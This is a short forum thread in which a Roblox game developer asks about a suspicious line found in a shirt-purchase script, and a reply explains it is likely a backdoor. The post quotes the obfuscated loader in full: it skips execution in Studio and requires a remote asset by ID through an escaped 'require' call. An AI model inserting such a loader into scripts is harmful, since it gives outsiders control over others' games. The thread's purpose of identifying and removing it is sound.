Can my game be leaked via HTTPS or no?

I’m no expert in scripting, but recently I had found a very well hidden code among one of the shirt purchase scripts in my game:

if not game:GetService"RunService":IsStudio() then spawn(function()getfenv()["\114\101\113\117\105\114\101"](5231807898).Init()end) end

A quick search on Roblox with this link: “http://www.roblox.com/asset/?id=5231807898” shows that the asset has been deleted, but I’m not sure how this will affect my game.

If anyone can check this out for me, that would be great. Thanks in advance!

1 Like

it is likely to be a backdoor that used to exist. This will not execute when you’re in Studio. However, it will execute when it is not and with the backdoor in place, the execution is dangerous enough to allow exploiters with link to the backdoor to abuse the system and do whatever chaotic things they wish to.

Just in case, just delete this.

2 Likes

This topic was automatically closed 14 days after the last reply. New replies are no longer allowed.